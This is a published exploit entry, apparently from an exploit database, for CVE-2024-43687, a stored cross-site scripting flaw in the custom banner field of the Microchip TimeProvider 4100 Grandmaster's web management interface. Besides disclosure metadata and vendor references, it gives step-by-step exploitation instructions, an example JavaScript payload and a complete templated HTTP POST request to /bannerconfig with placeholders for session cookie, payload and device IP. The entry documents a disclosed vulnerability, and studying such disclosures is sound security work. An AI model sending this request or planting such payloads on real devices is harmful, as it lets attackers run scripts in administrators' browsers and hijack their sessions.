## https://sploitus.com/exploit?id=PACKETSTORM:190258
# Exploit Title: Microchip TimeProvider 4100 Grandmaster (banner) - Stored XSS
# Exploit Author: Armando Huesca Prida
# Discovered By: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli
# Date of Disclosure: 27/06/2024
# Date of CVE Publication: 4/10/2024
# Exploit Publication: 10/10/2024
# Vendor Homepage: https://www.microchip.com/
# Version: Firmware release 1.0 through 2.4.7
# Tested on: Firmware release 2.3.12
# CVE: CVE-2024-43687
# External References:
# URL: https://www.cve.org/cverecord?id=CVE-2024-43687
# URL: https://www.0xhuesca.com/2024/10/cve-2024-43687.html
# URL: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-stored-xss-vulnerability-in-banner
# URL: https://www.gruppotim.it/it/footer/red-team.html
# Vulnerability Description:
The TimeProvider 4100 grandmaster firmware has a stored Cross-Site Scripting (XSS) vulnerability in the custom banner configuration field. A threat actor that exploits this vulnerability is able to execute arbitrary scripts in any user context.
# Exploitation Steps:
1- Log in to the device's web management interface.
2- Open the banner configuration panel.
3- Select the "custom banner" feature.
4- Insert the malicious JavaScript payload.
5- Apply and save the system configuration containing the custom banner.
6- Victims who connect to the device's web management interface will execute the malicious payload in their browser.
# Example of malicious JavaScript payload:
<img src=a onerror=alert(1)>
# Proof of Concept - PoC:
By manually modifying the following request, it is possible to create a new custom device banner containing a malicious JavaScript payload, resulting in a stored XSS vulnerability. The list of values โโthat must be updated in the exploit HTTP request is given below:
- [session cookie]
- [malicious JavaScript payload]
- [device IP]
# Exploit - HTTP Request:
POST /bannerconfig HTTP/1.1
Host: [device IP]
Cookie: ci_session=[session cookie]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------9680247575877256312575038502
Content-Length: 673
Origin: https://[device IP]
Referer: https://[device IP]/bannerconfig
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: keep-alive
-----------------------------9680247575877256312575038502
Content-Disposition: form-data; name="user_level"
1
-----------------------------9680247575877256312575038502
Content-Disposition: form-data; name="bannerradio"
CUSTOMIZED
-----------------------------9680247575877256312575038502
Content-Disposition: form-data; name="txtcustom"
[malicious JavaScript payload]
-----------------------------9680247575877256312575038502
Content-Disposition: form-data; name="action"
applybanner
-----------------------------9680247575877256312575038502--
# End